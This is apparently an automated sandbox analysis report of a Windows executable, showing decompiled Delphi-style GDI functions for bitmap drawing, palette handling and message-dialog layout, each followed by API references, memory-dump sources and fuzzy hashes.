                                  					_v32 = SetTextColor(_t182, 0);
                                  					_v36 = SetBkColor(_t182, 0xffffff);
                                  					StretchBlt(_t182, _v8, _v12, _a40, _a36, _a12, _a8, _a4, _t171, _t184, 0x8800c6);
                                  					StretchBlt(_t182, _v8, _v12, _a40, _a36, _v20, 0, 0, _t171, _t184, 0x660046);
                                  					SetTextColor(_t182, _v32);
                                  					SetBkColor(_t182, _v36);
                                  					if(_v28 != 0) {
                                  						SelectObject(_v20, _v28);
                                  					}
                                  					DeleteObject(_v24);
                                  					_pop(_t178);
                                  					 *[fs:eax] = _t178;
                                  					_push(0x429cff);
                                  					if(_v40 != 0) {
                                  						SelectPalette(_v20, _v40, 0);
                                  					}
                                  					return DeleteDC(_v20);
                                  				} else {
                                  					_v24 = E004298D4(CreateCompatibleBitmap(_a32, 1, 1));
                                  					_v24 = SelectObject(_a12, _v24);
                                  					_push(_t186);
                                  					_push(0x429b4b);
                                  					_push( *[fs:eax]);
                                  					 *[fs:eax] = _t188;
                                  					MaskBlt(_t182, _v8, _v12, _a40, _a36, _a32, _a28, _a24, _v24, _a8, _a4, E00407554(0xaa0029, 0xcc0020));
                                  					_pop(_t180);
                                  					 *[fs:eax] = _t180;
                                  					_push(0x429cff);
                                  					_v24 = SelectObject(_a12, _v24);
                                  					return DeleteObject(_v24);
                                  				}
                                  			}























                                  APIs
                                  • CreateCompatibleBitmap.GDI32(?,00000001,00000001), ref: 00429ABB
                                  • SelectObject.GDI32(?,?), ref: 00429AD0
                                  • MaskBlt.GDI32(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00429B1F
                                  • SelectObject.GDI32(?,?), ref: 00429B39
                                  • DeleteObject.GDI32(?), ref: 00429B45
                                  • CreateCompatibleDC.GDI32(00000000), ref: 00429B59
                                  • CreateCompatibleBitmap.GDI32(?,?,?), ref: 00429B7A
                                  • SelectObject.GDI32(?,?), ref: 00429B8F
                                  • SelectPalette.GDI32(?,E4080BBA,00000000), ref: 00429BA3
                                  • SelectPalette.GDI32(?,?,00000000), ref: 00429BB5
                                  • SelectPalette.GDI32(?,00000000,000000FF), ref: 00429BCA
                                  • SelectPalette.GDI32(?,E4080BBA,000000FF), ref: 00429BE0
                                  • RealizePalette.GDI32(?), ref: 00429BEC
                                  • StretchBlt.GDI32(?,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 00429C0E
                                  • StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,?,?,?,?,00440328), ref: 00429C30
                                  • SetTextColor.GDI32(?,00000000), ref: 00429C38
                                  • SetBkColor.GDI32(?,00FFFFFF), ref: 00429C46
                                  • StretchBlt.GDI32(?,?,?,?,?,?,?,?,?,?,008800C6), ref: 00429C72
                                  • StretchBlt.GDI32(?,?,?,?,?,?,00000000,00000000,?,?,00660046), ref: 00429C97
                                  • SetTextColor.GDI32(?,?), ref: 00429CA1
                                  • SetBkColor.GDI32(?,?), ref: 00429CAB
                                  • SelectObject.GDI32(?,00000000), ref: 00429CBE
                                  • DeleteObject.GDI32(?), ref: 00429CC7
                                  • SelectPalette.GDI32(?,00000000,00000000), ref: 00429CE9
                                  • DeleteDC.GDI32(?), ref: 00429CF2
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: Select$ObjectPalette$ColorStretch$CompatibleCreateDelete$BitmapText$MaskRealize
                                  • String ID:
                                  • API String ID: 3976802218-0
                                  • Opcode ID: d535fbb6402ff41293d0300d37f714f803e66bade4dcb18a5a879d0e25071eba
                                  • Instruction ID: 137ece586c3cb9bf3b7d518b345f1369d367df033f7d4c78b9f48a9134d9aae6
                                  • Opcode Fuzzy Hash: d535fbb6402ff41293d0300d37f714f803e66bade4dcb18a5a879d0e25071eba
                                  • Instruction Fuzzy Hash: E881B4B1A00219AFDB50EFA9DC81EAF77FCAB0C714F150529F618E7281C279AD108B75
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 79%
                                  			E0042D0E0(void* __eax, long __ecx, struct HPALETTE__* __edx) {
                                  				struct HBITMAP__* _v8;
                                  				struct HDC__* _v12;
                                  				struct HDC__* _v16;
                                  				struct HDC__* _v20;
                                  				char _v21;
                                  				void* _v28;
                                  				void* _v32;
                                  				intOrPtr _v92;
                                  				intOrPtr _v96;
                                  				int _v108;
                                  				int _v112;
                                  				void _v116;
                                  				int _t68;
                                  				long _t82;
                                  				void* _t117;
                                  				intOrPtr _t126;
                                  				intOrPtr _t127;
                                  				long _t130;
                                  				struct HPALETTE__* _t133;
                                  				void* _t137;
                                  				void* _t139;
                                  				intOrPtr _t140;
                                  
                                  				_t137 = _t139;
                                  				_t140 = _t139 + 0xffffff90;
                                  				_t130 = __ecx;
                                  				_t133 = __edx;
                                  				_t117 = __eax;
                                  				_v8 = 0;
                                  				if(__eax == 0 || GetObjectA(__eax, 0x54,  &_v116) == 0) {
                                  					return _v8;
                                  				} else {
                                  					E0042C5D4(_t117);
                                  					_v12 = 0;
                                  					_v20 = 0;
                                  					_push(_t137);
                                  					_push(0x42d2db);
                                  					_push( *[fs:eax]);
                                  					 *[fs:eax] = _t140;
                                  					_v12 = E004298D4(GetDC(0));
                                  					_v20 = E004298D4(CreateCompatibleDC(_v12));
                                  					_v8 = CreateBitmap(_v112, _v108, 1, 1, 0);
                                  					if(_v8 == 0) {
                                  						L17:
                                  						_t68 = 0;
                                  						_pop(_t126);
                                  						 *[fs:eax] = _t126;
                                  						_push(0x42d2e2);
                                  						if(_v20 != 0) {
                                  							_t68 = DeleteDC(_v20);
                                  						}
                                  						if(_v12 != 0) {
                                  							return ReleaseDC(0, _v12);
                                  						}
                                  						return _t68;
                                  					} else {
                                  						_v32 = SelectObject(_v20, _v8);
                                  						if(_t130 != 0x1fffffff) {
                                  							_v16 = E004298D4(CreateCompatibleDC(_v12));
                                  							_push(_t137);
                                  							_push(0x42d293);
                                  							_push( *[fs:eax]);
                                  							 *[fs:eax] = _t140;
                                  							if(_v96 == 0) {
                                  								_v21 = 0;
                                  							} else {
                                  								_v21 = 1;
                                  								_v92 = 0;
                                  								_t117 = E0042CA18(_t117, _t133, _t133, 0,  &_v116);
                                  							}
                                  							_v28 = SelectObject(_v16, _t117);
                                  							if(_t133 != 0) {
                                  								SelectPalette(_v16, _t133, 0);
                                  								RealizePalette(_v16);
                                  								SelectPalette(_v20, _t133, 0);
                                  								RealizePalette(_v20);
                                  							}
                                  							_t82 = SetBkColor(_v16, _t130);
                                  							BitBlt(_v20, 0, 0, _v112, _v108, _v16, 0, 0, 0xcc0020);
                                  							SetBkColor(_v16, _t82);
                                  							if(_v28 != 0) {
                                  								SelectObject(_v16, _v28);
                                  							}
                                  							if(_v21 != 0) {
                                  								DeleteObject(_t117);
                                  							}
                                  							_pop(_t127);
                                  							 *[fs:eax] = _t127;
                                  							_push(0x42d29a);
                                  							return DeleteDC(_v16);
                                  						} else {
                                  							PatBlt(_v20, 0, 0, _v112, _v108, 0x42);
                                  							if(_v32 != 0) {
                                  								SelectObject(_v20, _v32);
                                  							}
                                  							goto L17;
                                  						}
                                  					}
                                  				}
                                  			}

























                                  APIs
                                  • GetObjectA.GDI32(?,00000054,?), ref: 0042D103
                                  • GetDC.USER32(00000000), ref: 0042D131
                                  • CreateCompatibleDC.GDI32(?), ref: 0042D142
                                  • CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 0042D15D
                                  • SelectObject.GDI32(?,00000000), ref: 0042D177
                                  • PatBlt.GDI32(?,00000000,00000000,?,?,00000042), ref: 0042D199
                                  • CreateCompatibleDC.GDI32(?), ref: 0042D1A7
                                  • SelectObject.GDI32(?), ref: 0042D1EF
                                  • SelectPalette.GDI32(?,?,00000000), ref: 0042D202
                                  • RealizePalette.GDI32(?), ref: 0042D20B
                                  • SelectPalette.GDI32(?,?,00000000), ref: 0042D217
                                  • RealizePalette.GDI32(?), ref: 0042D220
                                  • SetBkColor.GDI32(?), ref: 0042D22A
                                  • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 0042D24E
                                  • SetBkColor.GDI32(?,00000000), ref: 0042D258
                                  • SelectObject.GDI32(?,00000000), ref: 0042D26B
                                  • DeleteObject.GDI32 ref: 0042D277
                                  • DeleteDC.GDI32(?), ref: 0042D28D
                                  • SelectObject.GDI32(?,00000000), ref: 0042D2A8
                                  • DeleteDC.GDI32(00000000), ref: 0042D2C4
                                  • ReleaseDC.USER32(00000000,00000000), ref: 0042D2D5
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: ObjectSelect$Palette$CreateDelete$ColorCompatibleRealize$BitmapRelease
                                  • String ID:
                                  • API String ID: 332224125-0
                                  • Opcode ID: ee4438414f97e0493f9d882ccbc2aba43e5685e5aa93120b0cde5737cf5bf7c9
                                  • Instruction ID: b4d77d8e726f4fdb61d65c6fc07a9a9a301113e851f6d72de6a562f2a6715fff
                                  • Opcode Fuzzy Hash: ee4438414f97e0493f9d882ccbc2aba43e5685e5aa93120b0cde5737cf5bf7c9
                                  • Instruction Fuzzy Hash: C9513B71F04219ABEB10EBE9DC45FAEB7FCAB08704F51446AB615E7281D6789900CB68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 89%
                                  			E0043FA90(intOrPtr __eax, void* __ebx, signed char __ecx, char __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                                  				intOrPtr _v8;
                                  				char _v9;
                                  				signed int _v11;
                                  				intOrPtr* _v16;
                                  				int _v20;
                                  				int _v24;
                                  				int _v28;
                                  				int _v32;
                                  				int _v36;
                                  				signed int _v40;
                                  				int _v44;
                                  				signed int _v48;
                                  				intOrPtr _v52;
                                  				signed int _v56;
                                  				intOrPtr _v60;
                                  				char _v61;
                                  				char _v62;
                                  				CHAR* _v68;
                                  				intOrPtr* _v72;
                                  				intOrPtr* _v76;
                                  				intOrPtr* _v80;
                                  				struct tagRECT _v96;
                                  				char _v100;
                                  				char _v104;
                                  				char _v108;
                                  				char _v112;
                                  				intOrPtr _t203;
                                  				int _t220;
                                  				signed int _t224;
                                  				void* _t228;
                                  				CHAR* _t231;
                                  				signed int _t240;
                                  				signed int _t256;
                                  				signed int _t264;
                                  				intOrPtr* _t267;
                                  				signed int _t296;
                                  				signed int _t297;
                                  				intOrPtr _t321;
                                  				void* _t339;
                                  				signed int _t351;
                                  				signed int _t356;
                                  				CHAR* _t363;
                                  				int _t374;
                                  				void* _t375;
                                  				void* _t376;
                                  				void* _t377;
                                  				void* _t378;
                                  				signed int _t419;
                                  				signed int _t422;
                                  				intOrPtr _t441;
                                  				void* _t448;
                                  				int _t457;
                                  				intOrPtr* _t459;
                                  				int _t463;
                                  				intOrPtr* _t464;
                                  				intOrPtr _t465;
                                  				intOrPtr* _t470;
                                  				void* _t471;
                                  				void* _t473;
                                  				void* _t477;
                                  				void* _t481;
                                  				void* _t485;
                                  				void* _t490;
                                  				void* _t491;
                                  				void* _t500;
                                  				void* _t506;
                                  
                                  				_t506 = __fp0;
                                  				_v112 = 0;
                                  				_v108 = 0;
                                  				_v104 = 0;
                                  				_v100 = 0;
                                  				_v11 = __ecx;
                                  				_v9 = __edx;
                                  				_v8 = __eax;
                                  				 *[fs:eax] = _t473 + 0xffffff94;
                                  				_v16 = E0043F5B4(1, __edi);
                                  				_t384 =  *_v16;
                                  				 *((intOrPtr*)( *_v16 + 0x70))( *[fs:eax], 0x43ffff, _t473, __edi, __esi, __ebx, _t471);
                                  				E00461278(_v16, 3);
                                  				E004293D8(E00461530(_v16));
                                  				 *((char*)(_v16 + 0x22d)) = 1;
                                  				_t203 = _v16;
                                  				 *((intOrPtr*)(_t203 + 0x1dc)) = _v16;
                                  				 *((intOrPtr*)(_t203 + 0x1d8)) = E0043F644;
                                  				E0043F3E8(E00461530(_v16),  &_v24);
                                  				_t374 = _v24;
                                  				_v28 = MulDiv(8, _t374, 4);
                                  				_t463 = _v20;
                                  				_v32 = MulDiv(8, _t463, 8);
                                  				_t457 = MulDiv(0xa, _t374, 4);
                                  				_v36 = MulDiv(0xa, _t463, 8);
                                  				_v40 = MulDiv(0x32, _t374, 4);
                                  				_t375 = 0;
                                  				_t464 = 0x4bca88;
                                  				_v76 = 0x4a0c8c;
                                  				do {
                                  					_t477 = _t375 - 0xf;
                                  					if(_t477 <= 0) {
                                  						asm("bt [ebp-0x7], eax");
                                  					}
                                  					if(_t477 < 0) {
                                  						if( *_t464 == 0) {
                                  							_t384 = 0;
                                  							E0041B1E4(0, _t375, 0, 0,  &_v96, 0);
                                  							_t356 = E004490B0(_v16);
                                  							E0040656C( *_v76, 0,  &_v100);
                                  							_t363 = E00404898(_v100);
                                  							DrawTextA(E004294DC(E00461530(_v16)), _t363, 0xffffffff,  &_v96, _t356 | 0x00000420);
                                  							 *_t464 = _v96.right - _v96.left + 8;
                                  						}
                                  						_t351 =  *_t464;
                                  						if(_t351 > _v40) {
                                  							_v40 = _t351;
                                  						}
                                  					}
                                  					_t375 = _t375 + 1;
                                  					_v76 = _v76 + 4;
                                  					_t464 = _t464 + 4;
                                  					_t481 = _t375 - 0xb;
                                  				} while (_t481 != 0);
                                  				_v44 = MulDiv(0xe, _v20, 8);
                                  				_v48 = MulDiv(4, _v24, 4);
                                  				_push(0);
                                  				_t220 = E00464E70() >> 1;
                                  				if(_t481 < 0) {
                                  					asm("adc eax, 0x0");
                                  				}
                                  				SetRect( &_v96, 0, 0, _t220, ??);
                                  				_t224 = E004490B0(_v16);
                                  				_t228 = E00404698(_v8);
                                  				_t231 = E00404898(_v8);
                                  				DrawTextA(E004294DC(E00461530(_v16)), _t231, _t228 + 1,  &_v96, _t224 | 0x00000450);
                                  				_v68 =  *((intOrPtr*)(0x4a0c4c));
                                  				_t465 = _v96.right;
                                  				_v52 = _v96.bottom;
                                  				if(_v68 != 0) {
                                  					_t465 = _t465 + _t457 + 0x20;
                                  					if(_v52 < 0x20) {
                                  						_v52 = 0x20;
                                  					}
                                  				}
                                  				_t240 = 0;
                                  				_t376 = 0;
                                  				do {
                                  					_t485 = _t376 - 0xf;
                                  					if(_t485 <= 0) {
                                  						asm("bt [ebp-0x7], edx");
                                  					}
                                  					if(_t485 < 0) {
                                  						_t240 = _t240 + 1;
                                  					}
                                  					_t376 = _t376 + 1;
                                  				} while (_t376 != 0xb);
                                  				_t377 = 0;
                                  				if(_t240 != 0) {
                                  					_t377 = _v40 * _t240 + (_t240 - 1) * _v48;
                                  				}
                                  				E00460898(_v16, E0042F8FC(_t465, _t377) + _v28 + _v28);
                                  				_t490 = _v52 + _v44 + _v36 + _v32 + _v32;
                                  				E004608C8(_v16, _v52 + _v44 + _v36 + _v32 + _v32);
                                  				_t419 = E00464E70() >> 1;
                                  				if(_t490 < 0) {
                                  					asm("adc edx, 0x0");
                                  				}
                                  				_t256 =  *(_v16 + 0x48) >> 1;
                                  				if(_t490 < 0) {
                                  					asm("adc eax, 0x0");
                                  				}
                                  				_t491 = _t419 - _t256;
                                  				E0044648C(_v16);
                                  				_t422 = E00464E64() >> 1;
                                  				if(_t491 < 0) {
                                  					asm("adc edx, 0x0");
                                  				}
                                  				_t264 =  *(_v16 + 0x4c) >> 1;
                                  				if(_t491 < 0) {
                                  					asm("adc eax, 0x0");
                                  				}
                                  				E004464B0(_v16, _t422 - _t264);
                                  				if(_v9 == 4) {
                                  					_t267 =  *0x4bb048; // 0x4bcb7c
                                  					E00466FA0( *_t267,  &_v108);
                                  					E00446D74(_v16, _t377, _v108, _t465);
                                  				} else {
                                  					E0040656C( *0x004A0C38, _t384,  &_v104);
                                  					E00446D74(_v16, _t377, _v104, _t465);
                                  				}
                                  				_t493 = _v68;
                                  				if(_v68 != 0) {
                                  					_t459 = E0043CF14(1);
                                  					 *((intOrPtr*)( *_t459 + 0x18))();
                                  					 *((intOrPtr*)( *_t459 + 0x68))();
                                  					_push(LoadIconA(0, _v68));
                                  					_t339 = E0042B3DC( *((intOrPtr*)(_t459 + 0x168)));
                                  					_pop(_t448);
                                  					E0042F258(_t339, _t448);
                                  					 *((intOrPtr*)( *_t459 + 0x84))(0x20, 0x20);
                                  				}
                                  				_t458 = E004387B8(_v16, 1);
                                  				 *((intOrPtr*)(_v16 + 0x2f8)) = _t458;
                                  				 *((intOrPtr*)( *_t458 + 0x18))();
                                  				 *((intOrPtr*)( *_t458 + 0x68))();
                                  				E00438C90(_t458, 1);
                                  				E00446D74(_t458, _t377, _v8, _t465);
                                  				E00446704(_t458,  &_v96);
                                  				 *((intOrPtr*)( *_t458 + 0x70))();
                                  				_v60 = _t465 - _v96.right + _v28;
                                  				if(E00403814(_t458, _t493) != 0) {
                                  					_v60 = E00446748(_v16) - _v60 -  *((intOrPtr*)(_t458 + 0x48));
                                  				}
                                  				 *((intOrPtr*)( *_t458 + 0x84))(_v96.bottom, _v96.right);
                                  				if((_v11 & 0x00000004) == 0) {
                                  					__eflags = _v11 & 0x00000001;
                                  					if((_v11 & 0x00000001) == 0) {
                                  						_v61 = 5;
                                  					} else {
                                  						_v61 = 0;
                                  					}
                                  				} else {
                                  					_v61 = 2;
                                  				}
                                  				if((_v11 & 0x00000008) == 0) {
                                  					__eflags = _v11 & 0x00000002;
                                  					if((_v11 & 0x00000002) == 0) {
                                  						_v62 = 2;
                                  					} else {
                                  						_v62 = 1;
                                  					}
                                  				} else {
                                  					_v62 = 3;
                                  				}
                                  				_t296 = E00446748(_v16) - _t377;
                                  				_t297 = _t296 >> 1;
                                  				if(_t296 < 0) {
                                  					asm("adc eax, 0x0");
                                  				}
                                  				_v56 = _t297;
                                  				_t378 = 0;
                                  				_v76 = 0x4a0c60;
                                  				_t470 = 0x4a0c8c;
                                  				_v80 = 0x4a0cb8;
                                  				do {
                                  					_t500 = _t378 - 0xf;
                                  					if(_t500 <= 0) {
                                  						asm("bt [ebp-0x7], eax");
                                  					}
                                  					if(_t500 < 0) {
                                  						_v72 = E0043C0B0(_v16, 1, _t458, _t506);
                                  						 *((intOrPtr*)( *_v72 + 0x18))();
                                  						 *((intOrPtr*)( *_v72 + 0x68))();
                                  						E0040656C( *_t470,  *_v72,  &_v112);
                                  						E00446D74(_v72, _t378, _v112, _t470);
                                  						 *((intOrPtr*)(_v72 + 0x214)) =  *_v80;
                                  						_t501 = _t378 - _v61;
                                  						if(_t378 == _v61) {
                                  							E0043C190(_v72, 1, _t501);
                                  						}
                                  						if(_t378 == _v62) {
                                  							 *((char*)(_v72 + 0x211)) = 1;
                                  						}
                                  						_t458 =  *_v72;
                                  						 *((intOrPtr*)( *_v72 + 0x84))(_v44, _v40);
                                  						_v56 = _v56 + _v40 + _v48;
                                  						if(_t378 == 0xa) {
                                  							_t321 = _v72;
                                  							 *((intOrPtr*)(_t321 + 0x124)) = _v16;
                                  							 *((intOrPtr*)(_t321 + 0x120)) = 0x43f62c;
                                  						}
                                  					}
                                  					_t378 = _t378 + 1;
                                  					_v80 = _v80 + 4;
                                  					_t470 = _t470 + 4;
                                  					_v76 = _v76 + 4;
                                  				} while (_t378 != 0xb);
                                  				_pop(_t441);
                                  				 *[fs:eax] = _t441;
                                  				_push(0x440006);
                                  				return E004043FC( &_v112, 4);
                                  			}

                                  APIs
                                    • Part of subcall function 0043F5B4: SystemParametersInfoA.USER32(00000029,00000000,00000154,00000000), ref: 0043F5F1
                                    • Part of subcall function 0043F5B4: CreateFontIndirectA.GDI32(?), ref: 0043F5FE
                                    • Part of subcall function 0043F3E8: GetTextExtentPointA.GDI32(00000000,00000034,00000034,?), ref: 0043F423
                                  • MulDiv.KERNEL32 ref: 0043FB3D
                                  • MulDiv.KERNEL32 ref: 0043FB4D
                                  • MulDiv.KERNEL32 ref: 0043FB5A
                                  • MulDiv.KERNEL32 ref: 0043FB66
                                  • MulDiv.KERNEL32 ref: 0043FB73
                                  • DrawTextA.USER32(00000000,00000000,000000FF,?,00000000), ref: 0043FBE6
                                  • MulDiv.KERNEL32 ref: 0043FC19
                                  • MulDiv.KERNEL32 ref: 0043FC29
                                  • SetRect.USER32 ref: 0043FC4F
                                  • DrawTextA.USER32(00000000,00000000,00000001,?,00000000), ref: 0043FC87
                                  • LoadIconA.USER32 ref: 0043FDE7
                                    • Part of subcall function 00466FA0: GetWindowTextA.USER32(?,?,00000100), ref: 00466FC3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: Text$Draw$CreateExtentFontIconIndirectInfoLoadParametersPointRectSystemWindow
                                  • String ID: $,eB$Image$Message$JC
                                  • API String ID: 4220236395-2965881020
                                  • Opcode ID: 460c6871ef05eacfa5a5d00163182b5520afddbd2a1bd1d043c68edda0077695
                                  • Instruction ID: 1765c426b7c94df1ba52cd6c48d941c233f242c363627cca1e50e62d628e48ba
                                  • Opcode Fuzzy Hash: 460c6871ef05eacfa5a5d00163182b5520afddbd2a1bd1d043c68edda0077695
                                  • Instruction Fuzzy Hash: BA024B75E002089FDB00EFA9C885A9DB7F5FF49308F14816AE904EB362D779AD05CB59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 79%
                                  			E0042DF50(intOrPtr __eax, void* __ebx, void* __ecx, intOrPtr* __edx, void* __edi, void* __esi, char* _a4) {
                                  				intOrPtr _v8;
                                  				intOrPtr* _v12;
                                  				struct HDC__* _v16;
                                  				struct HDC__* _v20;
                                  				void* _v24;
                                  				BITMAPINFOHEADER* _v28;
                                  				intOrPtr _v32;
                                  				char _v36;
                                  				signed int _v37;
                                  				struct HBITMAP__* _v44;
                                  				void* _v48;
                                  				struct HPALETTE__* _v52;
                                  				struct HPALETTE__* _v56;
                                  				intOrPtr* _v60;
                                  				intOrPtr* _v64;
                                  				short _v66;
                                  				short _v68;
                                  				signed short _v70;
                                  				signed short _v72;
                                  				void* _v76;
                                  				intOrPtr _v172;
                                  				char _v174;
                                  				intOrPtr _t150;
                                  				signed int _t160;
                                  				intOrPtr _t164;
                                  				signed int _t193;
                                  				signed int _t218;
                                  				signed short _t224;
                                  				intOrPtr _t251;
                                  				intOrPtr* _t255;
                                  				intOrPtr _t261;
                                  				char* _t288;
                                  				intOrPtr _t299;
                                  				intOrPtr _t300;
                                  				intOrPtr _t305;
                                  				signed int _t307;
                                  				signed int _t327;
                                  				void* _t329;
                                  				void* _t330;
                                  				signed int _t331;
                                  				void* _t332;
                                  				void* _t333;
                                  				void* _t334;
                                  				intOrPtr _t335;
                                  
                                  				_t326 = __edi;
                                  				_t333 = _t334;
                                  				_t335 = _t334 + 0xffffff54;
                                  				_t329 = __ecx;
                                  				_v12 = __edx;
                                  				_v8 = __eax;
                                  				_v52 = 0;
                                  				_v44 = 0;
                                  				_v60 = 0;
                                  				_t288 =  &_v36;
                                  				 *((intOrPtr*)( *_v12 + 0xc))(__edi, __esi, __ebx, _t332);
                                  				_v37 = _v36 == 0xc;
                                  				if(_v37 != 0) {
                                  					_v36 = 0x28;
                                  				}
                                  				_v28 = E00402AE4(_v36 + 0x40c, 4, _t288);
                                  				_v64 = _v28;
                                  				_push(_t333);
                                  				_push(0x42e46d);
                                  				_push( *[fs:edx]);
                                  				 *[fs:edx] = _t335;
                                  				_push(_t333);
                                  				_push(0x42e440);
                                  				_push( *[fs:edx]);
                                  				 *[fs:edx] = _t335;
                                  				if(_v37 == 0) {
                                  					 *((intOrPtr*)( *_v12 + 0xc))();
                                  					_t330 = _t329 - _v36;
                                  					_t150 =  *((intOrPtr*)(_v64 + 0x10));
                                  					if(_t150 != 3 && _t150 != 0) {
                                  						_v60 = E004035DC(1);
                                  						if(_a4 == 0) {
                                  							E00402FB0( &_v174, 0xe);
                                  							_v174 = 0x4d42;
                                  							_v172 = _v36 + _t330;
                                  							_a4 =  &_v174;
                                  						}
                                  						 *((intOrPtr*)( *_v60 + 0x10))();
                                  						 *((intOrPtr*)( *_v60 + 0x10))();
                                  						 *((intOrPtr*)( *_v60 + 0x10))();
                                  						E0041F170(_v60,  *_v60, _v36 - 4, _v12, _t326, _t330, _t330, 0);
                                  						 *((intOrPtr*)( *_v60 + 0x14))();
                                  						_v12 = _v60;
                                  					}
                                  				} else {
                                  					 *((intOrPtr*)( *_v12 + 0xc))();
                                  					_t261 = _v64;
                                  					E00402FB0(_t261, 0x28);
                                  					_t251 = _t261;
                                  					 *(_t251 + 4) = _v72 & 0x0000ffff;
                                  					 *(_t251 + 8) = _v70 & 0x0000ffff;
                                  					 *((short*)(_t251 + 0xc)) = _v68;
                                  					 *((short*)(_t251 + 0xe)) = _v66;
                                  					_t330 = _t329 - 0xc;
                                  				}
                                  				_t255 = _v64;
                                  				 *_t255 = _v36;
                                  				_v32 = _v28 + _v36;
                                  				if( *((short*)(_t255 + 0xc)) != 1) {
                                  					E004297B4();
                                  				}
                                  				if(_v36 == 0x28) {
                                  					_t224 =  *(_t255 + 0xe);
                                  					if(_t224 == 0x10 || _t224 == 0x20) {
                                  						if( *((intOrPtr*)(_t255 + 0x10)) == 3) {
                                  							E0041F100(_v12, 0xc, _v32);
                                  							_v32 = _v32 + 0xc;
                                  							_t330 = _t330 - 0xc;
                                  						}
                                  					}
                                  				}
                                  				if( *(_t255 + 0x20) == 0) {
                                  					 *(_t255 + 0x20) = E00429A44( *(_t255 + 0xe));
                                  				}
                                  				_t327 = _v37 & 0x000000ff;
                                  				_t267 =  *(_t255 + 0x20) * 0;
                                  				E0041F100(_v12,  *(_t255 + 0x20) * 0, _v32);
                                  				_t331 = _t330 -  *(_t255 + 0x20) * 0;
                                  				if( *(_t255 + 0x14) == 0) {
                                  					_t307 =  *(_t255 + 0xe) & 0x0000ffff;
                                  					_t218 = E00429A64( *((intOrPtr*)(_t255 + 4)), 0x20, _t307);
                                  					asm("cdq");
                                  					_t267 = _t218 * (( *(_t255 + 8) ^ _t307) - _t307);
                                  					 *(_t255 + 0x14) = _t218 * (( *(_t255 + 8) ^ _t307) - _t307);
                                  				}
                                  				_t160 =  *(_t255 + 0x14);
                                  				if(_t331 > _t160) {
                                  					_t331 = _t160;
                                  				}
                                  				if(_v37 != 0) {
                                  					E00429D0C(_v32);
                                  				}
                                  				_v16 = E004298D4(GetDC(0));
                                  				_push(_t333);
                                  				_push(0x42e3bb);
                                  				_push( *[fs:edx]);
                                  				 *[fs:edx] = _t335;
                                  				_t164 =  *((intOrPtr*)(_v64 + 0x10));
                                  				if(_t164 == 0 || _t164 == 3) {
                                  					if( *0x4a062c == 0) {
                                  						_v44 = CreateDIBSection(_v16, _v28, 0,  &_v24, 0, 0);
                                  						if(_v44 == 0 || _v24 == 0) {
                                  							if(GetLastError() != 0) {
                                  								E0040E138(_t255, _t267, _t327, _t331);
                                  							} else {
                                  								E004297B4();
                                  							}
                                  						}
                                  						_push(_t333);
                                  						_push( *[fs:eax]);
                                  						 *[fs:eax] = _t335;
                                  						E0041F100(_v12, _t331, _v24);
                                  						_pop(_t299);
                                  						 *[fs:eax] = _t299;
                                  						_t300 = 0x42e38a;
                                  						 *[fs:eax] = _t300;
                                  						_push(0x42e3c2);
                                  						return ReleaseDC(0, _v16);
                                  					} else {
                                  						goto L27;
                                  					}
                                  				} else {
                                  					L27:
                                  					_v20 = 0;
                                  					_v24 = E00402AE4(_t331, _t267, 0);
                                  					_push(_t333);
                                  					_push(0x42e323);
                                  					_push( *[fs:edx]);
                                  					 *[fs:edx] = _t335;
                                  					_t273 = _t331;
                                  					E0041F100(_v12, _t331, _v24);
                                  					_v20 = E004298D4(CreateCompatibleDC(_v16));
                                  					_v48 = SelectObject(_v20, CreateCompatibleBitmap(_v16, 1, 1));
                                  					_v56 = 0;
                                  					_t193 =  *(_v64 + 0x20);
                                  					if(_t193 > 0) {
                                  						_t273 = _t193;
                                  						_v52 = E00429FD0(0, _t193);
                                  						_v56 = SelectPalette(_v20, _v52, 0);
                                  						RealizePalette(_v20);
                                  					}
                                  					_push(_t333);
                                  					_push(0x42e2f7);
                                  					_push( *[fs:edx]);
                                  					 *[fs:edx] = _t335;
